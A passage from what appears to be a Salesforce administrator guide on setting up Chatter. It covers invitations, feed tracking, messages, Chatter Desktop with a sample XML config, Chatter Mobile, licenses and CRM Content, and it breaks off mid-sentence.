COLLABORATION TOOLS
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This allows Chatter to include a person's manager and direct reports in their people recommendations. It also allows
Chatter to recommend records that someone's manager and direct reports own or follow.

See Also:
Allowing Users to Invite Customers

ENABLE CHATTER

Turning On Chatter
Chatter provides feeds, groups, and profiles and lets people in your organization collaborate with each other.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

User Permissions Needed

“Customize Application”To enable Chatter:

Chatter is enabled by default for organizations created after June 22, 2010.

1. From Setup, click Customize > Chatter > Settings.
2. Under Chatter Settings, select Enable. Deselect to disable Chatter.
3. Click Save.

Consider the following tips when enabling Chatter:

• Enabling Chatter also enables the new user interface theme, which updates the look and feel of Salesforce.
• Enabling Chatter also enables global search, which allows searching across Salesforce, including Chatter feeds, files, groups,

and people.
• When Chatter is enabled for organizations with 15 or fewer users, all users automatically follow each other.
• Enabling Chatter also enables task generation in record feeds, which further gives you the option to enable the task publisher

(allowing users to create a task right on a record detail page).
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• After enabling Chatter, you can also enable Chatter Mobile for supported mobile devices.

See Also:
Setting Up Chatter
Is Chatter secure?
What kind of control do administrators have over data in Chatter?
What happens to posts if we disable Chatter? Are the posts removed completely?

Is Chatter secure?
Yes, Chatter is completely secure and works in accordance with all of the security and permission settings in your Salesforce
organization.

Is Chatter the same as instant messaging?
No, Chatter is a collaboration application that helps you connect with coworkers inside your Salesforce organization and share
business information securely and in real time. .

What kind of control do administrators have over data in
Chatter?

Administrators can manage user profile information and delete Chatter feed updates, including posts and comments.

See Also:
Customizing Chatter Feed Tracking
Administering Chatter Messages
Can I prevent certain words from being used in Chatter posts?
Can I take control of the Chatter Expert user?

Can I take control of the Chatter Expert user?
As an administrator, you can either deactivate or take over the Chatter Expert user and provide posts to your company. By
default, the Chatter Expert posts when a new user chooses to start one of the groups suggested by Chatter on the Groups you
can join page.

To deactivate the Chatter Expert:

1. Click People > Find People.
2. Search for Chatter Expert.
3. Click Manage User > Deactivate User.

To take control of the Chatter Expert so that you can send and receive posts:
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1. Click People > Find People.
2. Search for Chatter Expert.
3. Change the email address to your own.

What happens to posts if we disable Chatter? Are the posts
removed completely?

Disabling Chatter does not delete any of the data. Re-enabling Chatter restores all of the posts.

See Also:
Turning On Chatter

Allowing Users to Invite Coworkers
Allow Salesforce.com users to invite coworkers without Salesforce.com licenses to Chatter.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

User Permissions Needed

“Customize Application”To enable Chatter:

You must enable Chatter before you can enable invitations.

Invited users can access Chatter people, profiles, groups, and files but can’t see record data unless they have a Salesforce license.

1. From Setup, click Customize > Chatter > Settings.
2. Click Edit.
3. Select Allow Coworker Invitations.
4. Click Add more to add company email domains.

You must provide at least one email domain. You can add up to 200 domains. The domains you enter should include those
used in email addresses for your company. We recommend that you don't enter public email domains such as hotmail.com,
yahoo.com, or gmail.com. If invited, anyone with an email address in these domains can join and see user profiles, feeds,
and Chatter groups.

Starting in June 2011, invitations are automatically turned on for new Salesforce organizations and the Company Email
Domains field is populated based on the first user's email address. Invitations aren't turned on if the user's domain is a
free email provider such as yahoo.com or gmail.com.

5. Click Save.
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If you deselect Allow Coworker Invitations, users can't accept outstanding invitations. Similarly, if you remove an
email domain, users can't accept outstanding invitations from that domain.

See Also:
Allowing Users to Invite Customers

Topics Privacy
Topic names and descriptions are not private, even those that appear solely in private groups and on records. Posts with topics
have the same security and privacy as those without topics.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

This table explains where you can see all topics and where you can’t see topics used solely in private groups or on records.

Doesn’t show topics used solely in
private groups and on records

Shows all topicsUser interface element

Topics list

Topic search results

Topic reports

Related Topics on the topic detail page

Recently Talked About topics on group
detail pages

Recently Talked About topics on profiles

Trending Topics on the Chatter page

Topic suggestions when adding topics to
a post

Deleting Topics
Administrators can delete topics using the Chatter API or the SOAP API.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Customize Application”To delete topics:
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Chatter administrators can’t restrict the topics people use in their updates, but they can delete topics using the Chatter API
or the SOAP API. Because topic names and descriptions are not private, administrators might want to delete topics for
compliance reasons or to remove inappropriate content. When deleting topics, consider these points.

• Topics are hard deleted. They aren’t sent to the Recycle Bin.
• Deleted topics are removed from search results, the topics list, all posts, Recently Talked About topics, Related Topics,

and your users’ favorites. Deleted topics are removed from Trending Topics after the next calculation.
• Deleted topics are not blacklisted. Users can reintroduce a topic after it’s been deleted.

See Also:
Chatter REST API Developer's Guide
SOAP API Developer's Guide

INVITING CUSTOMERS

Allowing Users to Invite Customers
Allow users to invite customers to private groups that they own or manage.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

User Permissions Needed

“Customize Application”To enable Chatter:

You must enable Chatter before you can enable customer invitations.

Note:  Custom domains created using My Domain aren’t supported with customer invitations. If you’re using a
custom domain or IP restrictions and want to allow customer invitations, we recommend adding a link to the custom
domain login page redirecting customers to https://login.salesforce.com, or require customers to log in
using single sign-on..

Customers are users outside of your company's email domains. They have very limited Chatter access and can only see groups
they're invited to and interact with members of those groups.

1. From Setup, click Customize > Chatter > Settings.
2. Click Edit.
3. Select Allow Customer Invitations.
4. Click Save.
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Turning off customer invitations won't delete existing customers or groups that allow customers.

See Also:
Allowing Users to Invite Coworkers
Can portal users use Chatter?
Can I connect multiple Salesforce organizations using Chatter?

Can portal users use Chatter?
Chatter is not available to portal users in partner portals or Customer Portals. Chatter is available to customer users and partner
users in Communities.

See Also:
Allowing Users to Invite Customers

Can I connect multiple Salesforce organizations using
Chatter?

Chatter is only available on a per-organization basis. Only users within the same Salesforce organization can communicate
with each other using Chatter. However, you can add people outside of your company's email domains to use Chatter in your
organization as a customer in groups you own or manage.

See Also:
Allowing Users to Invite Customers

FEED TRACKED CHANGES TO RECORDS

Feed Tracking
When you enable objects and fields for feed tracking, people see Chatter feed updates for objects and changes to fields on
records they follow.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

The Account, Case, Contact, Lead, Opportunity and User objects are not available in Database.com.
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User Permissions Needed

“Customize Application”To customize fields tracked in feeds:

“View Setup and Configuration”To view the field tracking setup page:

Feed tracking is available for objects and fields. You can configure feed tracking for users, Chatter groups, custom objects, and
the following standard objects: accounts, article types, assets, campaigns, cases, contacts, contracts, dashboards, events, leads,
opportunities, products, reports, solutions, and tasks.

Sharing rules and field-level security determine visibility of record changes in Chatter feeds; you must be able to see a record
in order to see changes to that record in feeds.

Consider the following feed tracking tips:

• These objects and fields are tracked by default:

◊ Account: Account Name, Account Owner

◊ Case: Case Owner, Priority, Status

◊ Chatter Group: Allow Customers, Description, Group Access, Information Body, Information Title,
Name, Owner Name

◊ Contact: Account Name, Contact Owner, Name

◊ Lead: Lead Owner, Lead Status, Name

◊ Opportunity: Amount, Close Date, Opportunity Name, Opportunity Owner, Stage

◊ User: About Me, Address, E-mail, Manager, Phone, Title

• If leads are tracked, but accounts, contacts, or opportunities are not, users won't be able to follow or see updates related to
the accounts, contacts, and opportunities created during lead conversion.

• For person accounts, select the account fields you want to track. You can follow account fields, but not contact fields. For
example, select the Email field on account to see a Chatter post any time someone changes the email on a person account.

• Feed tracking for events doesn't include requested meetings. Once a requested meeting is confirmed and becomes an event,
then it can be included in feeds.

• While you can follow activities and knowledge articles in a Chatter feed, the Follow button in the Action column for
activity and knowledge article list views is not available.

• Tracked feed updates that are older than 45 days and have no likes or comments are removed from the feed automatically.
The tracked feed updates no longer appear in the feed, but the audit history for the tracked objects is still available.

See Also:
Turning On Chatter
Customizing Chatter Feed Tracking
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Customizing Chatter Feed Tracking
When an administrator enables feed tracking, users see updates for objects and records they follow in their Chatter feed. Many
objects and fields are tracked by default, but administrators can further customize feed tracking to include or exclude specific
objects and fields.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

The Account, Case, Contact, Lead, Opportunity and User objects are not available in Database.com.

User Permissions Needed

“Customize Application”To customize fields tracked in feeds:

“View Setup and Configuration”To view the field tracking setup page:

You can configure feed tracking for users, Chatter groups, custom objects, and the following standard objects: accounts, article
types, assets, campaigns, cases, contacts, contracts, dashboards, events, leads, opportunities, products, reports, solutions, and
tasks.

The following standard field types can't be tracked:

• Auto-number, formula, and roll-up summary fields
• Encrypted and read-only system fields
• The Expected Revenue field on opportunities
• The Solution Title and Solution Details fields on solutions; these fields display only for translated solutions in

organizations with multilingual solutions enabled

1. From Setup, click Customize > Chatter > Feed Tracking.
2. Select an object.
3. Select Enable Feed Tracking.

You must have the required user permissions to see this checkbox. To restore the default feed tracking settings for an
object, click Restore Defaults.

4. Select up to 20 fields to track. You can't select fields for article types.
5. If you have publisher actions enabled, you see the All Related Objects option. Select this checkbox to show feed

items when related objects are created.
6. Click Save.

See Also:
Feed Tracking
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Customizing Chatter Influence
Customize Chatter activity thresholds to improve the Chatter influence calculation.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Customize Application”To customize Chatter influence:

1. From Setup, click Customize > Chatter > Influence.
2. Click Edit to change the minimum activity thresholds.

All minimum activity thresholds default to zero. If you set non-zero thresholds, users who don’t meet all three minimums
are considered observers and aren’t counted when calculating people’s relative rank in the organization. Users who do meet
all three minimums but have low activity numbers relative to active influencers and top influencers are also considered
observers; however, they are counted when calculating influence.

3. Click Save.
Chatter influence is recalculated when you save these values.

Warning:  Use caution when setting new thresholds because users’ influence levels can change immediately.

See Also:
Setting Up Chatter

Enabling Email Notifications and Replies
When you turn on email notifications, users receive emails about new posts, comments, and other changes. The user can
control the type and frequency of the emails. Email replies allow users to reply to messages or to comments directly from the
email notification.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

User Permissions Needed

“Customize Application”To enable Chatter:

You must enable Chatter before you can enable email notifications.
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1. From Setup, click Customize > Chatter > Settings.
2. Click Edit.
3. Select Allow Emails to enable email notifications.

Users can configure the type and frequency of email notifications they want to receive in their email settings.

4. Select Allow Email Replies to allow users to reply to email notifications about messages and comments via email instead
of navigating to the comment or message in Chatter.

5. Click Save.

See Also:
Setting Up Chatter

Can I change the location of Chatter feeds using the page
layout editor?

Currently, you can't change the location of Chatter feeds. However, users can click the Hide Chatter link in a Chatter
feed to hide the feed, and the Show Chatter link to show the feed.

Enabling and Disabling Task Creation in Feeds
We heard your feedback: Creating tasks right in the Chatter feed for a record is faster and easier, but it could be more flexible.
Now you can customize task creation to improve support for your organization’s workflow.

If you enabled Chatter Tasks in Spring ’13, you can re-create those features by following the overall steps in Re-Creating
Chatter Tasks Features Using Publisher Actions.

See Also:
Publisher Actions Overview
Setting Up Publisher Actions
Re-Create Chatter Tasks Features Using Publisher Actions

Enabling and Disabling Feed Item Generation for New
Tasks

We heard your feedback: Seeing some tasks in Chatter feeds is useful—but too many tasks can overwhelm a feed. Now you
can determine what objects display the task publisher and the resulting task feed items.
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If you enabled Chatter Tasks in Spring ’13, you can re-create those features by following the overall steps in Re-Creating
Chatter Tasks Features Using Publisher Actions.

See Also:
Publisher Actions Overview
Setting Up Publisher Actions
Re-Create Chatter Tasks Features Using Publisher Actions

Re-Create Chatter Tasks Features Using Publisher Actions
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Edit Tasks”To create tasks:

Chatter Tasks is no longer available as of Summer ’13. If you enabled it in Spring ’13, you can re-create those features by
following these steps. From Setup:

1. Be sure feed tracking is enabled in Chatter Settings for each object.
2. Click Customize > Chatter > Settings and enable the publisher actions feature.
3. Click Customize > Object Name > Buttons, Links, and Actions. Create an action on the object, selecting Task as the

target object. Optionally, customize the task fields using the action layout editor. Repeat for each object.
4. On the Page Layouts page for each corresponding object, add the task action you’ve created to the object’s publisher by

dragging the action into the box under Chatter Feed. Save the layout.

The task publisher now appears in the feeds of the objects you’ve added it to, and new tasks appear in those records’ feeds.

See Also:
Publisher Actions Overview
Setting Up Publisher Actions
Customizing Chatter Feed Tracking

Administering Chatter Messages
Administrators with the appropriate permissions can view and delete all users' Chatter messages.

Available in: Enterprise, Unlimited, and Developer Editions for users with a Salesforce license, and Database.com Edition
for users with a Database.com Admin license
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User Permissions Needed

“Manage Users”To control other administrators' access to Chatter messages:

“Manage Chatter Messages”

AND

“API Enabled”

To view and delete Chatter messages via the SOAP API:

An administrator with the “Manage Chatter Messages” permission can view and delete all users' messages in Chatter; for
example, for compliance purposes. Users with this permission can access all users' Chatter messages via the SOAP API.

When deleting Chatter messages, consider these guidelines:

• Messages are hard deleted. They aren’t sent to the Recycle Bin.

• Deleted messages aren’t included in message search results.

• If all messages in a conversation are deleted, the conversation isn’t shown in My Messages and can’t be retrieved via the
Chatter REST API.

• If replies via email are enabled, when a user replies to a deleted message, Chatter returns an error notification and doesn’t
process the reply message.

CHATTER DESKTOP

Controlling Access to Chatter Desktop
Chatter Desktop is enabled for most organizations, but administrators can control access to Chatter Desktop.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

1. From Setup, click Desktop Administration > Chatter Desktop Settings.
2. Select Enable Chatter Desktop to allow users to access Chatter data from Chatter Desktop.

Deselect this option to block access to the Chatter Desktop self-installation page and prevent all instances of Chatter
Desktop from accessing Chatter data.

3. Select Allow Chatter Desktop Managed Installations Only to prevent non-administrators from installing
Chatter Desktop.

For example, select this option if your IT department plans to deploy Chatter Desktop to your organization.
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4. Click Save.

See Also:
Setting Up Chatter
Installing Chatter Desktop Managed Version
Configuring Chatter Desktop Managed Version

Installing Chatter Desktop Managed Version
Salesforce.com provides two Chatter Desktop installers: a standard version for individual installations and a managed version
for enterprise deployments.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

The following are the minimum requirements for using Chatter Desktop:

• Windows

◊ 2.33GHz or faster x86-compatible processor, or Intel Atom™ 1.6GHz or faster processor for netbook devices
◊ Microsoft® Windows® XP, Windows Server® 2003, Windows Server 2008, Windows Vista® Home Premium, Business,

Ultimate, or Enterprise (including 64 bit editions) with Service Pack 2, or Windows 7
◊ 512MB of RAM (1GB recommended)

• Mac

◊ Intel® Core™ Duo 1.83GHz or faster processor
◊ Mac OS X v 10.5, 10.6, or v10.7
◊ 512MB of RAM (1GB recommended)

Important: Chatter Desktop uses Adobe® Integrated Runtime (AIR®), Adobe's cross-platform runtime environment
for desktop applications, and only runs on operating systems that Adobe AIR supports. Chatter Desktop does not
run on operating systems that Adobe AIR does not support, such as 64-bit Linux. See the Adobe website for
information on Adobe AIR.

The managed version of Chatter Desktop is ideal for enterprises deploying Chatter Desktop to users who don't have
administrator privileges on their machines. The managed version:

• Doesn’t automatically install AIR—your IT department must obtain a redistribution agreement from Adobe Systems
Incorporated and deploy the required version of AIR before deploying Chatter Desktop

• Requires your IT department to accept the Chatter Desktop managed version end user license agreement on behalf of the
users to which Chatter Desktop is deployed

• Doesn’t automatically post to Chatter the first time Chatter Desktop launches
• Doesn’t regularly check Salesforce for new versions

To install the managed version:
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1. Deploy Adobe® Integrated Runtime (AIR®) version 2.6 or later (the latest version is recommended) to the machines on
which you plan to deploy Chatter Desktop.

AIR is Adobe's cross-platform runtime environment for desktop applications, and is a prerequisite for Chatter Desktop.

Tip:  Visit these links before deploying AIR:

• AIR® overview: http://www.adobe.com/devnet/air/articles/distributing_air_in_enterprise.html
• Information on obtaining an AIR® redistribution license from Adobe Systems Incorporated:

http://www.adobe.com/products/air/runtime_distribution1.html

• Installation information:
http://help.adobe.com/en_US/air/redist/WS485a42d56cd19641-70d979a8124ef20a34b-8000.html

• Administration information:
http://help.adobe.com/en_US/air/admin/WS485a42d56cd1964167ea49bd124ef17d52a-8000.html

2. From Setup, click Desktop Administration > Chatter Desktop Settings.
3. Click the link to download the managed version.

Important: Chatter Desktop uses Adobe® Acrobat® Reader to preview PDF files. Before previewing files with
Chatter Desktop, download Adobe Acrobat from Adobe's website, install it, and open it at least once to complete
the installation.

See Also:
Controlling Access to Chatter Desktop
Configuring Chatter Desktop Managed Version

Configuring Chatter Desktop Managed Version
Administrators can control Chatter Desktop settings by deploying an XML-based configuration file to each user's machine.
The configuration in the file overrides the user's settings.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

1. Create a file named .chatterdesktop and add a chatterdesktop parent element with two child elements, config
and servers.

2. Inside the config element, create the following child elements.

• launchOnStartup—Launches the application on startup.
• minimizeOnClose—Minimizes the application on close.
• notifications—Enables popup notifications.
• criticalAlerts—Enables alerts for new feed posts and comments by highlighting the taskbar icon (Windows) or

causing the dock icon to bounce (Mac OS).
• bringToForeground—Brings Chatter Desktop to the foreground for new feed posts and comments.
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• alwaysOnTop—Enables Chatter Desktop to always display in the foreground.
• chatWindowToForeground—Enables the chat window to display in the foreground when a new chat is received

(Mac only).
• chatSoundEnabled—Enables sounds for new chats received.
• playSoundForEveryMessage—Enables sounds for all chats received.

3. Set the default and editable attributes to true or false on each child element in the config element.

default determines the default setting, while editable determines if the user can change the default setting through
the user interface.

Note:  If the default attribute is set to true for chatSoundEnabled and false for
playSoundForEveryMessage, a sound plays only for new chats received. If both are set to true, a sound plays
for every chat received. If both are set to false, chat sounds are disabled.

4. If your organization uses instances of Salesforce other than Production and Sandbox, specify the servers that host those
instances in separate server elements inside the servers element.

Inside each server element, include the following attributes:

• label—The name of the connection as you want it to appear in the user interface.
• serverUrl—The URL you use to log into the instance. The URL must begin with https:// and end with

salesforce.com or chatter.com. For example, if your organization has a European division that you log into
from https://emea.salesforce.com, enter that URL and name the connection Europe..

• defaultServer—Set to TRUE to make this the default instance to which Chatter Desktop connects.

5. Optionally, test the .chatterdesktop configuration file.

a. Copy the .chatterdesktop configuration file to the user directory on your machine. The user directories are:

• Windows—c:\Documents and Settings\<username> (Windows XP) or C:\Users\<username> (Windows
7)

• Mac OS—/Users/<username>

• Linux—/home/<username>

b. Launch Chatter Desktop and verify that it functions correctly. See Troubleshooting Chatter Desktop if there are
problems.

6. Copy the .chatterdesktop file to the user directory on every machine running Chatter Desktop in your organization.

The following is a sample configuration file:

<chatterdesktop>
<config>

<launchOnStartup default="false"
editable="false"/>

<minimizeOnClose default="false"
editable="true"/>

<notifications default="true"
editable="true"/>

<criticalAlerts default="false"
editable="true"/>

<bringToForeground default="false"
editable="true"/>

<alwaysOnTop default="false"
editable="false"/>

<chatWindowToForeground default="false"
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editable="false"/>
<chatSoundEnabled default="true"

editable="true"/>
<playSoundForEveryMessage default="true"

editable="true"/>

</config>

<servers>
<server label="Europe"

serverUrl="https://emea.salesforce.com"
defaultServer="true"/>

<server label="Production"
serverUrl="https://login.salesforce.com"
defaultServer="false"/>

</servers>
</chatterdesktop>

See Also:
Controlling Access to Chatter Desktop
Installing Chatter Desktop Managed Version

CHATTER MOBILE

Configuring the Chatter Mobile App
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic settings:

“Manage Mobile Configurations”To change Salesforce Classic settings:

To configure access to the Chatter mobile app in your organization:

1. Log into Salesforce.
2. From Setup, click Mobile Administration > Chatter Mobile > Settings.
3. Click Edit.
4. Select Enable Chatter Mobile. Users receive an error message if they try to use the Chatter mobile app in an

organization in which the app is disabled.
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Note:  You cannot deauthorize the use of the Chatter mobile app for BlackBerry devices in your organization.

5. Select the mobile device types your organization allows to use Chatter mobile app. The Chatter mobile app displays an
error message if a user tries to use the Chatter mobile app on a restricted device.

6. Optionally, enable push notifications. Push notifications are alerts that apps render on mobile device home screens when
users are not using the app. These alerts can consist of text, icons, and sounds, depending on the device type.

The Chatter mobile app uses push notifications to keep users aware of important Chatter activity without requiring users
to return to the app. For example, push notifications can notify a user when someone posts on the user's profile, mentions
the user in a post, comments on the user's post, and more.

7. Optionally, set the session security timeout for the Chatter mobile app. When a session expires, users must enter their
passcode to access the Chatter mobile app on their mobile device. You don’t need to set this option if the operating system
automatically locks the device after a period of inactivity.

8. Click Save.
9. If your organization restricts login IP ranges, exempt the users and groups that need to access the Chatter mobile app

outside of your organization's login IP range. You do not need to exempt users with BlackBerry devices; BlackBerry devices
must already have Internet connectivity through a BlackBerry Enterprise Server with an IP address that falls within the
Salesforce login IP ranges.

10. Restart the Chatter mobile app if configuration changes in Salesforce do not appear on your mobile device.

See Also:
Viewing Chatter Mobile App Activity and Revoking Access

Bypassing IP Restrictions for Chatter Mobile App Users
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic settings:

“Manage Mobile Configurations”To change Salesforce Classic settings:

If your organization has trusted IP ranges, specify the users that can use the Chatter mobile app outside of those ranges.

Important:

• Users cannot use the Chatter mobile app outside of your trusted IP ranges unless you specifically include them or
their group in the list of users who can bypass the login IP restrictions.

• The users you specify can only bypass the restrictions with the Chatter mobile app; they can’t access Salesforce
through a Web browser outside of the trusted IP ranges.
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• You do not need to specify users with BlackBerry devices. BlackBerry devices must already connect through a
BlackBerry Enterprise Server with an IP address in a trusted Salesforce IP range.

• To specify trusted IP ranges, from Setup in Salesforce, click Security Controls > Network Access.

To specify which users and groups can use the Chatter mobile app outside of your organization’s login IP range:

1. From Setup, click Mobile Administration > Chatter Mobile > IP Restricted Users.

Note:  The IP restriction bypass settings appear only in organizations with profile-based IP restrictions.

2. Specify the users and groups that can bypass the restrictions with the Chatter mobile app.
3. Click Send Email. Salesforce sends them an email with download links for the mobile apps your organization supports

and a unique verification code. Users must enter the verification code on their device to use the Chatter mobile app.

Important:  Users with IP restrictions cannot use the Chatter mobile app unless they enter the verification code
from their mobile device. The verification code cannot be shared or transferred, and it expires after 24 hours. If
your code expires you must repeat the process to acquire a new code.

See Also:
Configuring the Chatter Mobile App

Viewing Chatter Mobile App Activity and Revoking Access
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“Manage Mobile Configurations”To view Chatter mobile app activity and revoke access to the
Chatter mobile app:

To view Chatter mobile app activity in your organization, including the date each user activated or used the app, from Setup,
click Mobile Administration > Chatter Mobile > Users and Devices.

You can also remotely revoke access to the Chatter mobile app for a specific device if the device is lost or stolen. Revoking
access prevents the device from accessing Chatter and deletes Chatter data from the device the next time the device attempts
to synchronize with Salesforce.

To revoke access for your own mobile device:

1. From Setup, click Manage Users > Users.
2. Click your name.
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3. In the Remote Access related list, click Revoke next to the entry for the Chatter mobile app.

To revoke access for mobile devices owned by other users:

1. From Setup, click Mobile Administration > Chatter Mobile > Users and Devices.
2. Select the users for whom you want to revoke access.
3. Click Revoke.

See Also:
Configuring the Chatter Mobile App

CHATTER ADMINISTRATION FAQS

Can I prevent certain words from being used in Chatter
posts?

No, not using the standard Chatter interface. However, Salesforce provides a free app, Chatter Blacklist, that lets you create
a “blacklist” of words, phrases, or custom expressions (for example, credit card numbers) that are prohibited in Chatter posts
and comments. These words can prevent a post, be substituted with approved words or phrases, or be recorded for audit
purposes.

See Also:
What kind of control do administrators have over data in Chatter?

Do Chatter posts and files count toward my storage use?
Chatter feed posts, tracked changes, and comments don’t count toward your data storage. However, any files and photos you
upload are counted against file storage. Files uploaded on the Files tab are also counted against file storage.

ADMINISTERING CHATTER FREE USERS

What is a Chatter moderator and who can be one?
A moderator is a Chatter user with some additional privileges such as:

• Assign and remove moderator privileges for multiple users in the organization, including Chatter Free users
• Delete posts and comments
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Anyone with the “Moderate Chatter” permission can be a moderator. This permission is set at the profile level and is on by
default for the Chatter Moderator User profile.

After a user is given moderator privileges, they have a special banner on their profile picture.

Can I change a Chatter Plus license to a Chatter Free
license?

You can't convert a Chatter Plus license or any other standard Salesforce licenses to a Chatter Free license. You can, however,
deactivate the Chatter Plus user and create a new Chatter Free user with a unique username. The history remains with the
Chatter Plus user.

See Also:
Can you upgrade a Chatter Free license to a Chatter Plus license?

Can you upgrade a Chatter Free license to a Chatter Plus
license?

Yes, an administrator can upgrade a Chatter Free license to a Chatter Plus license. If you have available Chatter Plus licenses
in your organization:

1. From Setup, click Manage Users > Users.
2. Click Edit next to the Chatter Free user you want to upgrade.
3. Change the user license to Chatter Only.
4. Change the profile to Chatter Only User.
5. Click Save.

If you don't have available Chatter Plus licenses, contact your sales representative.

See Also:
Can I change a Chatter Plus license to a Chatter Free license?
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Is there any setup required for new Chatter Plus users?
An administrator must expose the tabs for accounts, contacts, dashboards, and reports as they are hidden by default for Chatter
Plus users. Additionally, Salesforce CRM Content, Ideas, and Answers are disabled for Chatter Plus users by default, and
must be turned on for these profiles.

Note:  Professional Edition organizations must have Profiles enabled to perform these tasks. Contact your sales
representative for more information.

SALESFORCE CRM CONTENT

Setting Up Salesforce CRM Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Content Permissions”

OR

“Manage Salesforce CRM Content”

To create, edit, or delete library permissions:

“Manage Content Types”

OR

“Manage Salesforce CRM Content”

To create, edit, or delete content types:

“Manage Content Properties”

OR

“Manage Salesforce CRM Content”

To create content fields:

“Create Libraries”

OR

“Manage Salesforce CRM Content”

To create libraries:

“Manage Salesforce CRM Content”To edit or delete libraries:

Tip:

For more detailed information about setting up Salesforce CRM Content, refer to the Salesforce CRM Content
Implementation Guide.
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You can also enable Salesforce CRM Content in the Salesforce Classic app by adding the Content tab to the desired
mobile configuration data sets.

To set up Salesforce CRM Content for your organization:

1. Enable Salesforce CRM Content from Setup by clicking Customize > Salesforce CRM Content > Settings and selecting
Enable Salesforce CRM Content.

2. Give users access to Salesforce CRM Content by assigning feature licenses in one of the following ways:

• To assign feature licenses to users automatically, from Setup, click Customize > Salesforce CRM Content > Settings
and select Autoassign feature licenses to existing and new users.

• To assign feature licenses to users manually, from Setup, click Manage Users > Users and click Edit next to the user's
name. Select the Salesforce CRM Content User checkbox and click Save.

3. Verify that the Salesforce CRM Content users have the Salesforce CRM Content user permissions enabled. The user
permissions include “Manage Salesforce CRM Content, “Create Libraries,” “Manage Content Permissions,” “Manage
Content Properties”, “Manage Content Types”, and “Deliver Uploaded Files and Personal Content.”

Note:  Users with the “Deliver Uploaded Files and Personal Content” user permission can create content deliveries
from personal libraries. This user permission does not affect the ability to deliver content from shared libraries.

4. Optionally, create a public group with a set of Salesforce CRM Content users. You can save time later by assigning the
group to a library rather than assigning several users to the same library individually.

5. Optionally, create one or more library permissions. Library permissions are the groups of privileges that determine user
access within a library. Every user must be assigned a library permission before he or she can use a library. All new
organizations contain three library permissions: library administrator, author, and viewer.

6. Use the New Library Wizard to create a library, add members to the library, and assign library permissions to the members.
7. Categorize and define your content:

a. Create content fields. These are custom fields that you assign to a content type. The default fields are Description,
Tags, and Title. If you want to create a field named, for example, Reviewed By, your custom content field would
be a picklist with the names of possible reviewers.

b. Create a custom content type or modify the General content type. Content types are the containers for custom fields;
they determine which fields are available during the publishing process and how the fields display on the content details
page. You can create multiple content types and assign a content field to any or all content types. For example, if sales
and marketing users need to record different information about their content, you can create Sales and Marketing
content types. If you create a Related Campaign lookup field and add it to the Marketing content type only, users
who select the Sales content type during the upload process will not have the option to choose a campaign.

8. Optionally, enable the Add Google Doc to Salesforce service so library members can contribute Google docs to Salesforce
CRM Content.

Implementation Tips
• Before creating libraries, review the files you plan to store in Salesforce CRM Content to determine how many libraries

you need and what content belongs in each library. Users are given access to content based on library.
• If you have a large number of Salesforce CRM Content users, create a public group and add the group to a library rather

than adding users to the library individually.
• To enable Salesforce CRM Content functionality for leads, accounts, contacts, opportunities, cases, products, or custom

objects, add the Related Content related list to the appropriate page layout.
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• To send web-formatted content to colleagues, leads, or contacts and associate it with Salesforce records, add the Content
Deliveries related list to the page layout for leads, accounts, contacts, opportunities, cases, campaigns, or custom objects.

• To allow users to publish, edit, and search in any of the Salesforce-supported languages, from Setup, click Customize >
Salesforce CRM Content > Settings and click Enable multi-language search and contribute.

• To associate Google docs with a library, the Add Google Doc to Salesforce service must be activated for your organization.
• If you want PDFs to open inline rather than in a separate window, from Setup, click Customize > Salesforce CRM

Content > Settings and click Do not open PDFs in a separate window. Copy-protected PDFs can't be previewed.
• Salesforce CRM Content is available via the Customer Portal and partner portal.
• All Salesforce CRM Content items display as primary tabs in the Service Cloud Console.

Best Practices
• If you are using the Related Content related list on Salesforce objects, align your custom content fields with the standard

and custom fields on the object to increase the accuracy of a “Find Content” search. Clicking the Find Content button
on the related list matches content to the fields on the record and displays search results containing the related content.

• To ensure that content is classified consistently, define consistent tag names with your contributors. For example, by
establishing tag names at the outset, you can avoid having tags such as “channel” and “channels” in the same library.

• Avoid using too many tags. The search engine helps users find specific content, whereas tags enable users to browse and
subscribe. Therefore, excessive tagging creates unnecessary clutter.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase letters.

The case of the original tag is always used.
• To highlight valuable content and make it easier to find, mark it as “featured” on the content details page. Featured content

